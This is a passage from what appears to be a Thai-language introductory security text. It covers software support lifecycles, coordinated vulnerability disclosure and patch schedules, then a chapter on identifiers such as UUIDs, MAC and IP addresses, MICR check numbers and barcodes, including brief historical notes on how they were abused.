มักจะประกาศช่วงเวลาซัพพอร์ตให้กับลูกค้าไว้ล่วงหน้า ตัวอย่างเช่น วินโดวส์นั้นทางไมโครซอฟต์จะแบ่งช่วงเวลาซัพพอร์ตออกเป็นสองช่วง คือ ช่วงซัพพอร์ตหลัก (mainstream support) ที่จะมีอัพเดตให้รวมถึงมีฟีเจอร์ใหม่ๆ ที่สำคัญให้อยู่เสมอๆ เช่น เบราว์เซอร์รุ่นใหม่ หรือรองรับมาตรฐานใหม่ๆ และหลังจากช่วงนั้นไปแล้วจะเป็นช่วงซัพพอร์ตระยะยาว (extended support) ที่มีเฉพาะแพตช์ความปลอดภัย ในกรณีของ Windows 7 เพิ่มหมดซัพพอร์ตหลักไปเมื่อเดือนมกราคมที่ผ่านมา และจะหมดซัพพอร์ตทั้งหมดในวันที่ 14 มกราคม 2020 หรืออีกประมาณ 5 ปีข้างหน้า ในโลกของลินุกซ์ก็คล้ายกัน Red Hat Enterprise Linux (RHEL) ที่นิยมใช้งานกันในองค์กรแบ่งช่วงซัพพอร์ตออกเป็นสี่ช่วง ได้แก่ Production 1 แก้ปัญหาความปลอดภัย, แก้ไขปัญหา, และรองรับฮาร์ดแวร์ใหม่ๆ Production 2 แก้ปัญหาความปลอดภัย และรองรับฮาร์ดแวร์ใหม่เฉพาะกรณีที่ไม่ต้องเปลี่ยนซอฟต์แวร์มากนัก, Production 3 แก้ไขเฉพาะปัญหาความปลอดภัยระดับวิกฤติ (Critical) และระดับเร่งด่วน (Urgent) เท่านั้น ไม่มีแผนการรองรับฮาร์ดแวร์ใหม่ๆ หลังจากพ้นช่วง Production 3 ไปแล้วจะเป็นช่วง Extended Life Cycle Support (ELS) ที่จะแก้ปัญหาความปลอดภัยระดับวิกฤติเท่านั้นและซัพพอร์ตชนิดนี้ต้องซื้อเพิ่มเติม การซัพพอร์ตระบบปฎิบัติการส่วนมากจะรวมถึงไลบรารีต่างๆ ที่มาพร้อมกับระบบปฎิบัติการด้วย ในกรณีของลินุกซ์ ดิสโทรต่างๆ มักรวมเอาไลบรารีและซอฟต์แวร์จำนวนมากเข้าเป็นส่วนหนึ่งของโครงการ ไลบรารีและซอฟต์แวร์ที่ได้รับการซัพพอร์ตจากลินุกซ์ดิสโทรต่างๆ อาจจะไม่ใช่รุ่นใหม่ที่สุด แต่นโยบายการซัพพอร์ตก็จะตรงตามรอบของดิสโทรนั้นๆ ไปด้วย หากไลบรารีหยุดซัพพอร์ตไปก่อนนักพัฒนาของดิสโทรก็มักจะกลับไปแก้ซอฟต์แวร์รุ่นเก่าให้ เช่น กรณี RedHat ที่มาพร้อมกับ PHP 5.3 เมื่อพบบั๊กแต่ทาง PHP เลิกซัพพอร์ตไปแล้ว [ทาง RedHat ก็จะให้นักพัฒนาของตัวเองเข้ามาดูแลแพตช์นี้เอง](https://access.redhat.com/security/updates/backporting) เรียกว่า backporting ในกรณีเช่นนี้ต้องระวังว่าไม่ได้ใช้ซอฟต์แวร์ที่ติดตั้งได้แต่ไม่ได้ซัพพอร์ต เช่น EPEL ใน RedHat/CentOS, หรือ Universe และ Multiverse ใน Ubuntu ที่แม้จะติดตั้งได้สะดวก แต่ซอฟต์แวร์เหล่านี้ไม่ได้รับการซัพพอร์ตจากดิสโทรโดยตรง ทีมงานอาจจะปฎิเสธไม่แพตช์ซอฟต์แวร์ให้แม้มีปัญหา ### แจ้งเตือนและแก้ไข หัวใจสำคัญของการซัพพอร์ตซอฟต์แวร์ คือ กระบวนการแจ้งเตือนผู้พัฒนา เมื่อมีผู้พบช่องโหว่ความปลอดภัย โดยมารยาทแล้วจะไม่เปิดเผยช่องโหว่นั้นๆ สู่สาธารณะ แต่จะแจ้งเตือนไปยังเจ้าของโครงการโดยตรง โดยให้เวลากับเจ้าของโครงการเป็นระยะเวลาหนึ่งให้แก้ไข หากเจ้าของโครงการแจ้งกลับว่าไม่สามารถแก้ไขได้ทันก็สามารถขอยืดเวลานั้นได้ในบางกรณี ตัวอย่างของหน่วยงานแจ้งเตือน เช่น [CERT ให้เวลา 45 วันหลังแจ้งเตือนเพื่อแก้ไข]([https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm?)](https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm?)) หรือหากมีการโจมตีจริงแล้วก็าอาจจะลดระยะเวลาลงได้เช่นกัน หลังจากนั้นทาง CERT จะเปิดเผยข้อมูลทั้งหมดสู่สาธารณะ ส่วนโครงการเอกชนอย่าง Project Zero ของกูเกิลนั้นให้เวลา 90 วัน เมื่อทางโครงการได้รับคำแจ้งเตือนแล้วจะแจ้งไปยังผู้พัฒนาด้วยช่องทางส่วนตัว โดยโครงการมักกำหนดวันเปิดเผยบั๊กร่วมกับโครงการอื่นๆ เช่น Debian และ Ubuntu ซึ่งมี Debian เป็นฐานก็ควรอัพเดตพร้อมๆ กัน ไม่เช่นนั้นการแก้ไขบั๊กของ Debian จะกลายเป็นการเปิดเผยช่องโหว่ของโครงการอื่นๆ เจ้าของโครงการจะเป็นผู้ดูแลให้มีการอัพเดตซอฟต์แวร์พร้อมๆ กันในทุกๆ เวอร์ชั่นที่ยังซัพพอร์ตโดยดิสโทรอยู่ หลังจากนั้นนักพัฒนาจะส่งแพตช์ไปให้เจ้าของโครงการ ดิสโทรต่างๆ ก็จะปล่อยอัพเดตในเวลาไล่เลี่ยกัน สำหรับผู้ที่สนใจอ่านเพิ่มเติมอ่านได้ที่[บล็อคของคุณเทพพิทักษ์](http://thep.blogspot.sg/2010/01/libthai-security-update.html)ที่บันทึกประสบการณ์การแก้ช่องโหว่ความปลอดภัย [CVE-2009-4012](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4012) ในฐานะนักพัฒนา ### ทดสอบก่อนอัพเดต ปัญหาสำคัญของการแก้ปัญหาความปลอดภัยคือการแก้ปัญหาเหล่านั้นมักเป็นความลับ ขณะเดียวกันผู้ดูแลระบบเองก็มีความลำบากเพราะการเปลี่ยนแปลงซอฟต์แวร์แต่ละครั้งมักกระทบส่วนอื่นๆ อยู่เป็นระยะ ผู้ดูแลระบบที่รับผิดชอบต่อการอัพเดตจึงต้องการเวลาทดสอบแพตช์ที่ปล่อยออกมาว่าสามารถทำงานร่วมกับซอฟต์แวร์อื่นๆ ได้ถูกต้องหรือไม่ โครงการซอฟต์แวร์จำนวนมากจึงเริ่มวางมาตรการปล่อยแพตช์ความปลอดภัยในรูปแบบที่คาดเดาได้ แนวทางการปล่อยแพตช์สำคัญคือ Patch Tuesday ของไมโครซอฟท์ โดยกำหนดเป็นวันอังคารที่สองของทุกเดือน (ดู [Microsoft Security Bulletin](https://technet.microsoft.com/security/bulletin/) สังเกตวันที่ปล่อยอัพเดต) แนวทางนี้ทำให้ฝ่ายไอทีสามารถเตรียมบุคลากร เพื่อทดสอบซอฟต์แวร์ทันทีหลังแพตช์ปล่อยออกมา และนำระบบที่แพตช์แล้วขึ้นได้อย่างรวดเร็ว บริษัทซอฟต์แวร์ขนาดใหญ่มีแนวโน้มจะปล่อยแพตช์ในช่วงเวลาที่คาดเดาได้เช่นนี้มากขึ้น เช่นทุกวันนี้[ออราเคิลก็มีนโยบายปล่อยแพตช์ความปลอดภัย](http://www.oracle.com/technetwork/topics/security/alerts-086861.html)วันอังคารที่ใกล้กับวันที่ 17 ของทุกเดือน สำหรับซอฟต์แวร์ที่ต้องอาศัยการทดสอบมากกว่า อย่างเช่นระบบ CMS เพราะหน่วยงานอาจจะเข้าถึง API ระดับต่ำ หรือกระทั่งแพตช์ซอฟต์แวร์ด้วยตัวเอง การทดสอบมักใช้เวลามากกว่าระบบปฎิบัติการ หรือซอฟต์แวร์ที่มีอินเทอร์เฟซชัดเจนเช่นระบบฐานข้อมูล ตัวอย่าง [Drupal ประกาศกำหนดการอัพเดตเป็นเดือนละสองรอบ](https://www.drupal.org/node/1173280) โดยวันพุธแรกของเดือนจะเป็นการแก้บั๊กทั่วไป ส่วนวันพุธที่สามของเดือนจะเป็นการแก้บั๊กความปลอดภัยเท่านั้น แนวทางนี้ทำให้ผู้ดูแลระบบสามารถทดสอบแพตช์บั๊กอื่นๆ ไปได้ก่อน และน่าจะอัพเดตได้ทันทีหากมีบั๊กความปลอดภัย เพราะผลกระทบกับ API ต่างๆ น่าจะน้อย ### แนวทางโดยรวม กระบวนการซัพพอร์ตเป็นหัวใจสำคัญของการดูแลระบบให้มีความมั่นคงปลอดภัยในระยะยาว เราไม่สามารถวางใจกับระบบที่พัฒนาขึ้นโดยคำนึงถึงความปลอดภัยในช่วงเวลาหนึ่ง แล้วหวังว่าระบบนั้นๆ จะปลอดภัยไปได้ตลอดกาล โครงการที่ให้ความสำคัญกับความปลอดภัยจึงจำเป็นต้องคำนึงถึงการบำรุงรักษาระบบเสมอ สิ่งที่ต้องคำนึงถึง ได้แก่ - **ระยะเวลาซัพพอร์ตของซอฟต์แวร์ที่เกี่ยวข้อง**: นับตั้งแต่ตัวระบบปฎิบัติการ, ซอฟต์แวร์ประยุกต์ที่ซื้อมาใช้งาน, ไลบรารีสำหรับพัฒนา ฯลฯ ควรศึกษาอายุการซัพพอร์ตล่วงหน้าว่าแต่ละโครงการที่เกี่ยวข้องมีนโยบายการอัพเดตอย่างไร - **เตรียมทีมงานดูแลระบบต่อเนื่อง**: โครงการหนึ่งๆ ควรเตรียมการซัพพอร์ตไว้ตั้งแต่แรก ทั้งด้านงบประมาณและบุคคลากร ซอฟต์แวร์ไม่ว่าจะพัฒนาไว้ดีแค่ไหน ก็มีข้อผิดพลาดที่ต้องดูแลเสมอ - **ตรวจสอบความปลอดภัยเป็นระยะ**: ในกรณีที่มีซอฟต์แวร์พัฒนาเป็นการภายในอาจจะต้องมีการตรวจสอบความปลอดภัย (penetration testing) เพิ่มเติม
# Identification ไม่รู้จักฉัน ไม่รู้จักเธอ กระบวนการพื้นฐานที่สุดอย่างหนึ่งของกระบวนการความปลอดภัยข้อมูลไม่ว่าจะเป็นโลกดิจิตอลหรือโลกอนาล็อกที่เรามีชีวิตอยู่ก็ตาม คือ การระบุตัวตนของสิ่งต่างๆ ที่เราพบเจอทุกวัน เราพบกับสิ่งของ, ผู้คน, และสถานที่ต่างๆ มากมาย และเราต้องรู้ว่าสิ่งที่เราใช้งาน หรือคนที่เราพูดคุยด้วยนั้นเป็นคนที่เราต้องการคุยด้วยจริงหรือไม่ กระบวนการระบุตัวตน (identification) ในโลกความเป็นจริง เราระบุตัวตนกันด้วยข้อมูลหลายอย่าง เพื่อนของเราอาจจะถูกระบุตัวตนด้วย ชื่อจริง ชื่อเล่น (หรือชื่อพ่อชื่อแม่?) เราระบุตัวคนที่เรารู้จักด้วยใบหน้า หากหน้าเหมือนกันเราก็อนุมานได้ทันทีว่าคนที่เราพบคือคนๆ เดียวกับที่เราต้องการพูดคุยหรือไม่ ซึ่งหลายครั้งก็ผิดพลาดเพราะเราทักคนผิด หรือบางครั้งก็มีปัจจัยอื่นเช่นเราไปทักพี่น้องฝาแฝดของเพื่อนของเราได้ง่ายๆ หากไม่ใช่คนรู้จักสนิทสนมกัน แต่ได้รับการแนะนำมา เราอาจจะ "รู้จัก" คนๆ หนึ่งผ่านทางชื่อของเขา แต่เมื่อเราไปหาคนตามที่อยู่ที่เราได้รับ อาจจะเป็นสำนักงาน, คอนโด, บางครั้งการระบุตัวตนด้วยชื่ออาจจะผิดพลาดเพราะชื่อซ้ำซ้อนกันมากมาย เราไม่อาจจะหาตัวตนของเพื่อนของเราจากชื่อเล่นได้ หากชื่อเล่นของเพื่อนของเราอยู่บนขวดหรือกระป๋องโค้กในทุกวันนี้ เพราะคนที่ใช้ชื่อเดียวกันมีจำนวนมากมายมหาศาล ในโลกคอมพิวเตอร์ การระบุตัวตนนับเป็นด่านแรกของการกระทำกิจกรรมแทบทุกอย่าง เมื่อเครื่องของเราเริ่มเชื่อมต่อกับเครื่อข่ายต้องมีกระบวนการอ้างถึงเครื่องของคุณเสมอ เมื่อคุณเข้าเว็บสักเว็บ ไม่ว่าคุณจะล็อกอินหรือไม่ เบราว์เซอร์ของคุณจะได้รับตัวเลขประจำการเชื่อมต่อ (session ID) ผ่านทางข้อมูล cookie เมื่อได้รับมาครั้งแรกแล้ว ทุกครั้งที่คุณเข้าเว็บเดิม เบราว์เซอร์ของคุณจะส่งหมายเลขเดิมกลับไปยังเซิร์ฟเวอร์ทุกครั้งเพื่อระบุว่าคุณคือคนเดิมที่เคยเข้าเว็บนี้มา กระบวนการนี้ต้องอาศัยความร่วมมือของเบราว์เซอร์ที่จะส่งข้อมูลให้เสมอ เบราว์เซอร์หลายรุ่นมีฟีเจอร์ไม่ยอมรับ cookie ทำให้ไม่สามารถติดตามตัวได้ ขณะที่ฟีเจอร์มาตรฐานของเบราว์เซอร์รุ่นใหม่ๆ มักจะมีโหมดเป็นส่วนตัว เช่น Incognito แม้ว่ากระบวนการระบุตัวตนจะไม่เปลี่ยนไปนักในช่วงหลายสิบปีที่ผ่านมา เรายังคงใช้ข้อมูลพื้นฐานทั่วไป เช่น ชื่อนามสกุล แต่ปัญหาตัวตนซ้ำกันทำให้ในช่วงหลังเริ่มมีการอ้างอิงตัวตนกันด้วยกระบวนการอื่นๆ เช่น สำหรับคนทั่วไป เราจะเห็นการอ้างอิงตัวบุคคลด้วยเลขบัตรประชาชนแทนที่เพราะบัตรประชาชนสามารถจัดการการให้เลขแต่ละคนได้จนกระทั่งรับประกันได้ว่าทุกคนจะมีหมายเลขไม่ตรงกันทั้งประเทศ ในกรณีที่มีหน่วยงานดูแลการให้หมายเลขประจำตัว เช่น หมายเลขบัตรประชาชน หมายเลขโทรศัพท์ หรือทะเบียนรถยนต์ การจัดการไม่ให้หมายเลขซ้ำซ้อนสามารถทำได้ไม่ยากนัก ด้วยการตรวจสอบว่าหมายเลขใดมีการใช้งานไปแล้วบ้าง แต่ในกรณีที่ไม่มีหน่วยงานกลาง การจัดการหมายเลขประจำตัวกลายเป็นเรื่องซับซ้อนขึ้นมาทันที หากเราไม่สามารถคาดเดาได้ว่าจะมีหมายเลขประจำตัวใดถูกใช้งานไปแล้ว ### UUID UUID หรือ Universally Unique Identifier ถูกออกแบบมาเพื่อใช้ระบุตัวตนในเครือข่ายอินเทอร์เน็ตในหลายรูปแบบ เมื่อเราสร้างข้อมูลขึ้นมาชุดหนึ่งแล้วต้องการให้มีตัวเลขประจำตัวที่ไม่ซ้ำกับตัวเลขข้อมูลอื่นๆ ในโลก โดยทั่วไปมักใช้ UUID เพื่อสร้างตัวเลขประจำตัวให้กับข้อมูล, อุปกรณ์, หรือสิ่งใดๆ ก็ตามที่ต้องการการอ้างอิงถึง โดยไม่ต้องการศูนย์กลางเพื่อแจกหมายเลขให้ หมายเลข UUID นั้นจริงๆ แล้วเป็นหมายเลขขนาด 128 บิต ตัวเลขขนาด 128 บิตนี้ใหญ่พอที่ทุกคนจะสุ่มเลขแล้วมีความน่าจะเป็นที่จะซ้ำซ้อนกันได้ต่ำ อย่างไรก็ดีมีการแบ่งฟิลด์ไว้ภายใน โดยทั่วไปแล้วมักแบ่งออกเป็น 4 ฟิลด์ดังตัวอย่าง 550e8400-e29b-41d4-a716-446655440000 หรืออยู่ในฟอร์แมต xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx โดยตัวเลข N คือ variant หรือตัวเลขระบุการอิมพลีเมนต์ที่ต่างกัน ตัวอย่างหนึ่งของความแตกต่าง เช่น GUID ที่ใช้งานในซอฟต์แวร์ของไมโครซอฟท์ จะมีการจัดบิตแตกต่างไปจากระบบ UUID ระบบอื่น แต่กระนั้น GUID ก็ยังเป็นหมายเลข UUID ที่สามารถนำมาใช้งานได้ตามปกติ ส่วนตัวเลข M คือ เวอร์ชั่นของ UUID มีหลักๆ 5 เวอร์ชั่นได้แก่ 1. version 1: ใช้หมายเลข MAC ของเครื่องมาเติมลงใน 6 หลักแรกของหมายเลข UUID และที่เหลือให้เติมด้วยตัวเลขเวลาของเครื่อง ปัญหาของ UUID เวอร์ชั่นนี้คือการเปิดเผยหมายเลขเครื่อง ซึ่งหลายครั้งกลายเป็นปัญหาความปลอดภัย ข้อดีสำคัญของการสร้างหมายเลขรูปแบบนี้คือในเครื่องเดียวกันจะไม่มีทางซ้ำกันได้แน่นอน (เพราะสร้างคนละเวลากัน) 2. version 2: เพิ่มฟิลด์ที่สองเป็นหมายเลขโปรเซสขณะที่สร้างหมายเลขอยู่ การออกแบบต้องการให้หมายเลขที่สร้างขึ้นไม่ซ้ำกันในทุกครั้งที่รันโปรเซส แต่ในโลกความเป็นจริงหมายเลขโปรเซสนั้นซ้ำกันได้ง่ายมาก ทำให้รูปแบบนี้ไม่ได้รับความนิยมอีกต่อไป 3. version 3: เป็นค่า MD5 ของค่าประจำเครื่องนั้นๆ ค่าที่เป็นไปได้ ได้แก่ URL, โดเมนเนมแบบเต็ม, ค่า distinguished name ของ LDAP, หรือชื่อเฉพาะของระบบในระบบการตั้งชื่อใดๆ ค่า MD5 นั้นปกติจะให้ค่ายาว 128 บิตพอดี มาตรฐาน UUID ระบุให้ใช้ค่า M และ N แทนลงไปใน MD5 เลย การใช้ MD5 สามารถใช้เพื่อปกปิดชื่อที่แท้จริงของระบบได้ในกรณีที่ไม่ต้องการเปิดเผยชื่อที่แท้จริง แต่การใช้งานโดยมากถูกแทนที่โดย version 5 แล้ว 4. version 4: ค่าสุ่มอย่างสมบูรณ์ ทุกบิตยกเว้น M และ N จะถูกสุ่มมา การสร้างหมายเลขแต่ละครั้งไม่มีการรับประกันว่าจะซ้ำกับตัวสร้างอื่นๆ หรือไม่ แต่ความน่าจะเป็นที่จะซ้ำก็ต่ำมาก 5. version 5: เหมือน version 3 แต่เนื่องจาก MD5 อ่อนแอลงมากในช่วงหลัง ทำให้แฮกเกอร์อาจจะเปิดเผยชื่อที่แท้จริงได้ จึงให้ใช้ SHA-1 แทนที่ เนื่องจาก SHA-1 ให้ค่าแฮช 160 บิต จึงได้ตัดออกเหลือ 128 บิต การใช้งานจริงแต่ละภาษาจะรองรับไม่เท่ากัน เช่น ในภาษาไพธอน นั้นรองรับเฉพาะ 1, 3, 4, และ 5 ผ่านทางโมดูล uuid ### MAC Address ในยุคที่คอมพิวเตอร์แต่ละเครื่องล้วนทำงานแยกจากกันนั้น ไม่มีความจำเป็นใดๆ ที่คอมพิวเตอร์จะต้องระบุตัวตนระหว่างกันเอง แต่เมื่อถึงยุคเริ่มต้นของเครือข่ายคอมพิวเตอร์ก็เริ่มมีความจำเป็นที่คอมพิวเตอร์ที่เชื่อมต่อถึงกันจะต้องอ้างถึงกันได้ว่าเครื่องใดต้องการสื่อสารกับเครื่องใด และระบบหมายเลขที่ได้รับความนิยมสูงสุดระบบหนึ่งคือหมายเลข MAC ออกแบบมาพร้อมกับระบบอีเธอร์เน็ตโดย Xerox ที่ได้รับความนิยมสูงเช่นกัน ระบบ MAC ประกอบไปด้วยหมายเลข 6 ชุด แต่ละชุดเป็นเลข 8 บิต มักเขียนด้วยเลขฐาน 16 สองตัว เช่น A0-E5-FA-00-2B-C7 ตัวเลข MAC จะแบ่งออกเป็นสองชุดหลักๆ ได้แก่ 24 บิตแรกจะเป็นหมายเลขผู้ผลิต เรียกว่า OUI (organization unique identifier) ที่ต้องลงทะเบียนไว้กับหน่วยงานลงทะเบียนของ IEEE ชื่อว่า IEEE Registration Authority โดยทาง IEEE จะ[เปิดเผยว่ามีบริษัทที่จดทะเบียนไว้เป็นบริษัทใดบ้าง](https://standards.ieee.org/develop/regauth/oui/public.html) เมื่อบริษัทได้รับ OUI แล้วจะสามารถจัดสรรหมายเลขอีก 24 บิตที่เหลือได้เอง โดยมักจะรันหมายเลขไปเรื่อยๆ ตามการผลิต ทำให้หลายครั้งเมื่อเราซื้อคอมพิวเตอร์มาพร้อมๆ กัน จะได้เครื่องที่มีหมายเลข MAC นี้ใกล้เคียงกันทาง IEEE มีนโยบายว่าผู้ผลิตที่จะขอหมายเลข OUI ใหม่ได้ จะต้องใช้หมายเลขเดิมให้ถึง 95% เสียก่อน ทุกวันนี้หมายเลข MAC ถูกใช้งานในวงกว้างกว่าอีเธอร์เน็ตมาก การเชื่อมต่อคอมพิวเตอร์ส่วนมากมักมีหมายเลข MAC กำกับเสมอ เช่น IEEE1394 (Firewire), Bluetooth, และ Wi-Fi และในหัวข้อที่ผ่านมา UUID เองก็มักใช้ MAC เป็นส่วนประกอบในการสร้างหมายเลขอ้างอิงด้วยเช่นกัน หมายเลขประจำเครื่องในเครือข่ายไม่จำเป็นต้องเป็นหมายเลข MAC เสมอไป ในระบบเครือข่ายเฉพาะเช่น GSM ก็มีระบบตัวเลขประจำเครื่องของตัวเองเป็นหมายเลข IMEI หรือโครงข่ายปิดอื่นๆ อาจจะมีระบบหมายเลขของตัวเองได้ อย่างไรก็ดีหมายเลข MAC ได้รับความนิยมอย่างสูงจนกระทั่ง IEEE นำไปเรียกชื่อเป็น Extended Unique Identifier (EUI) และใช้ EUI-64 ซึ่งก็คือหมายเลข MAC เข้ามาเป็นส่วนหนึ่งของ IPv6 ### ไอพี: อ้างอิงข้ามโลก กระบวนการอ้างอิงคอมพิวเตอร์ เมื่อมีการเชื่อมต่อข้ามเครือข่ายที่ในระดับทั่วโลก ระบบเครือข่ายระดับฮาร์ดแวร์อาจจะต่างกันไป การสร้างหมายเลขไอพีทำให้เราสามารถอ้างอิงถึงคอมพิวเตอร์เครื่องอื่นๆ ได้ทั่วโลกโดยไม่ต้องรับรู้ว่าฮาร์ดแวร์ด้านล่างเป็นฮาร์ดแวร์อะไร กระบวนการให้หมายเลขประจำเครื่องแบบไม่มีโครงสร้างอย่าง MAC นั้นลำบากเกินไปที่จะสร้างตารางค้นหาเส้นทาง (routing table) หมายเลขไอพีกำหนดให้กับเครื่องทุกเครื่องในโลกที่เชื่อมต่อถึงกันผ่านเครือข่ายอินเทอร์เน็ต หมายเลขไอพีที่กำหนดให้คอมพิวเตอร์แต่ละเครื่องมีโครงสร้างอยู่ภายในแสดงข้อมูลทั้งหมายเลขประจำเครื่องและหมายเลขประจำเครือข่าย เครือข่ายที่อยู่ใกล้กันและสามารถติดต่อกับเครื่องอื่นๆ ผ่านเส้นทางเดียวกัน สามารถูกรวบเข้าเป็นเส้นทางเดียวกันได้ (route aggegation) ทำให้ขนาดของตารางค้นหาเส้นทางมีขนาดเล็กลงมาก ในโลกสมัยเดิม การยืนยันตัวตนด้วยหมายเลขไอพีนั้นเป็นเรื่องปกติ เว็บในยุคก่อนไม่ได้ใช้ cookie เพื่อระบุผู้ใช้เสมอไป ระบบเก่าๆ หลายครั้งอาศัยหมายเลขไอพีที่เชื่อมต่อเข้ามาเพื่อยืนยันตัวตนเพราะหมายเลขไอพีในยุคหนึ่งแล้วสามารถใช้ระบุตัวตนได้เป็นอย่างดี บริการในยุคเก่าเช่น rlogin นั้นเปิดให้ผู้ใช้สามารถล็อกอิน และส่งไฟล์ไปมาได้ เพียงแค่ปลายทางมีหมายเลขไอพีตรงกับหมายเลขไอพีที่ผู้ใช้ตั้งไว้ให้ "เชื่อ" ว่าเป็นเข้าของบัญชีเอง บริการ rlogin ถูกเจาะในภายหลังจากการปลอมไอพีด้วยวิธีการต่างๆ ส่งผลให้สุดท้าย rlogin ไม่ได้รับความนิยมไปในที่สุด และถูกแทนที่ด้วยบริการ Secure Shell (ssh) ### MICR: พบกันครึ่งทางระหว่างคนและคอมพิวเตอร์ หนึ่งในกระบวนการระบุตัวตนที่ได้รับความนิยมสูง คือ ตัวเลขรูปร่างแปลกๆ ที่เราเห็นอยู่ตามเอกสารทางการเงินหลายฉบับ ธนาคารในต่างประเทศต้องจัดการเอกสารจำนวนมาก จัดเรียง จำแนก และส่งเอกสารไปยังสาขาต่างๆ อยู่ทุกวัน เช่น การขึ้นเงินเช็ค ที่ธนาคารสาขาที่ได้รับเช็คจะต้องส่งเช็คกลับไปยังสาขาต้นทางของบัญชีเพื่อตัดยอดเงินในบัญชี กระบวนการเหล่านี้กินแรงงานอย่างมาก พนักงานต้องจัดเรียงเช็คจำนวนมหาศาลเพื่อส่งต่อ ความผิดพลาดเกิดขึ้นได้ทุกขั้นตอน จึงมีการใช้ตัวเลขที่คอมพิวเตอร์อ่านออกเข้ามาช่วย เรียกว่า magnetic ink character recognition (MICR) นับแต่ช่วงหลังสงครามโลกครั้งที่สอง สถาบันวิจัยสแตนฟอร์ด (ถ้าไม่มีมหาวิทยาลัยนี้ โลกคอมพิวเตอร์คงถอยไปอีกยี่สิบปี) ร่วมมือกับบริษัท General Electric พัฒนาฟอนต์ที่คอมพิวเตอร์สามารถอ่านได้โดยง่าย หลังจากปรับปรุงมาหลายรุ่นก็ได้ฟอนต์ที่ชื่อว่า E13B โดยชื่อฟอนต์มาจากรุ่นพัฒนาที่ 5 (ตัว E เป็นตัวที่ 5 ในภาษาอังกฤษ) ขนาดฟอนต์ 0.013 นิ้ว และปรับปรุงครั้งที่สองกลายเป็นรุ่น B หลังจากนั้นสมาคมธนาคารของสหรัฐฯ ก็เลือกใช้ฟอนต์นี้สำหรับการพิมพ์ตัวเลขที่คอมพิวเตอร์อ่านออก ในเช็คและเอกสารอื่นๆ ช่วงเวลาเยื้องๆ กัน ฟอนต์ CMC-7 ถูกพัฒนาในฝรั่งเศส และได้รับความนิยมในฝั่งยุโรปเช่นกัน MICR ทำให้เอกสาร ใช้ระบุหมายเลขรหัสเพื่อลดแรงงานคนได้มาก เช็ค ฉบับหนึ่งอาจจะระบุหมายเลขธนาคาร, สาขา, เลขบัญชี ฯลฯ เอาไว้ ทำให้ระบบคอมพิวเตอร์สามารถจัดเรียงเอกสารเหล่านี้และส่งกลับไปยังสาขาต้นทางได้โดยมีความผิดพลาดน้อยมาก กระบวนการหักบัญชีสามารถทำได้รวดเร็วและมีต้นทุนต่ำลง แต่เช่นเดียวกับเทคโนโลยีการระบุตัวตนอื่นๆ MICR ไม่มีกระบวนการตรวจสอบความถูกต้องใดๆ ในยุคหนึ่ง นักปลอมเช็คอย่าง Frank Abagnale (เจ้าของเรื่อง Catch me if you can) ใช้วิธีการง่ายๆ คือการปลอมเลข MICR ให้ไม่ตรงกับสาขาในเช็ค เช็คจะถูกส่งไปยังสาขาที่ระบุในเลขโดยไม่สนใจข้อความในเช็ค พนักงานจะเข้าใจว่าคอมพิวเตอร์ทำงานผิดพลาดหรือมีการพิมพ์เลข MICR ผิด ก่อนจะส่งเช็คกลับไปยังสาขาต้นทาง กระบวนการนี้ทำให้การตรวจสอบว่าเช็คเป็นเช็คปลอมเพราะไม่มีเงินในบัญชี หรือไม่มีบัญชีอยู่จริง ใช้เวลานานกว่าปกติ และทำให้ Abagnale สามารถหลบหนีการจับกุมไปได้ ### Barcode: คนมองเห็นแต่อ่านไม่ออก กระบวนการ "ระบุตัวตนด้วยคอมพิวเตอร์" ที่เราใช้กันอยู่ทุกวันอย่างเคยชิน คงเป็นกระบวนการแสกนบาร์โค้ด ทุกวันนี้สินค้าแทบทุกชนิดในร้านค้าล้วนมีบาร์โค้ดติดอยู่เพื่อความรวดเร็วในการคิดเงิน ลดความผิดพลาดในการจัดการ บาร์โค้ดที่ใช้งานหนักได้แก่มาตรฐาน UPC หรือ Universal Product Code แม้ว่าบาร์โค้ดจะดูเป็นข้อมูลสำหรับคอมพิวเตอร์เท่านั้น แต่ที่จริงแล้วมันคือข้อมูลที่แทนตัวเลขด้วยแท่งขาวกับดำเป็นรูปแบบที่ชัดเจน ในกรณีของมาตรฐาน UPC ซึ่งเป็นมาตรฐานสำหรับการระบุสินค้าทั่วโลก มาตรฐานการจัดการจะรวมตั้งแต่การจัดการหมายเลข 12 หลัก หลักแรกจะแบ่งประเภทของสินค้า เช่น อาจจะเป็นสินค้าทั่วไป, คูปองสำหรับแจกลูกค้าเฉพาะกิจ, หรืออาจจะเป็นหมายเลขภายในที่ไม่ต้องการใช้งานร่วมกับผู้อื่น ระบบตัวเลขนี้ผู้ผลิตจะต้องขอหมายเลขประจำผู้ผลิตห้าหลักไว้ล่วงหน้า ส่วนผู้ผลิตสามารถแจกหมายเลขสินค้าได้เองแบบเดียวกับหมายเลข MAC ที่มีหมายเลขผู้ผลิต เช่นเดียวกับระบบระบุตัวตนอื่นๆ รหัส UPC ไมมีกระบวนการยืนยันความถูกต้องใดๆ มันใช้เพียงให้คอมพิวเตอร์สามารถระบุหมายเลขประจำสินค้าได้อย่างแม่นยำ มีคดีอาชญากรรมที่ผู้ใช้เพียงแต่สลับเปลี่ยนฉลาก ทำให้คอมพิวเตอร์ระบุราคาสินค้าผิดพลาด แม้กระบวนการแปลงตัวเลขเป็นบาร์โค้ดจะดูซับซ้อน แต่ในความเป็นจริงแล้วหากฝึกฝนสักหน่อยก็สามารถเขียนด้วยมือได้ แฮกเกอร์ในยุคแรกบางคนอาศัยความสามารถเช่นนี้ในการปลอมแปลงบาร์โค้ดได้ด้วยมือ ในยุคแรกของการใช้งานบาร์โค้ดด้วยความแปลกใหม่ทำให้หลายหน่วยงานใช้งานบาร์โค้ดเพื่อการรักษาความปลอดภัย แต่ส่งผลกระทบคือบัตรที่ใช้ควบคุมการเข้าออกอาคารกลายเป็นบัตรที่ทำสำเนาได้โดยง่ายเพียงแค่ใช้เครื่องถ่ายเอกสารเท่านั้น รวมไปถึงบางครั้งอาจจะถูกปลอมแปลง "ด้วยมือ" เพียงการใส่ปากกาวาดแถบดำและขาวสลับกันอย่างถูกต้องเท่านั้น นอกจากบาร์โค้ดแบบ UPC ที่ได้รับความนิยมสูงแล้ว ยังมีบาร์โค้ดแบบอื่นๆ อีกมากที่ไม่ได้เป็นไปตามมาตรฐาน UPC เช่น Code 39 นั้นเป็นเพียงฟอนต์ที่สามารถพิมพ์ได้ตรงๆ 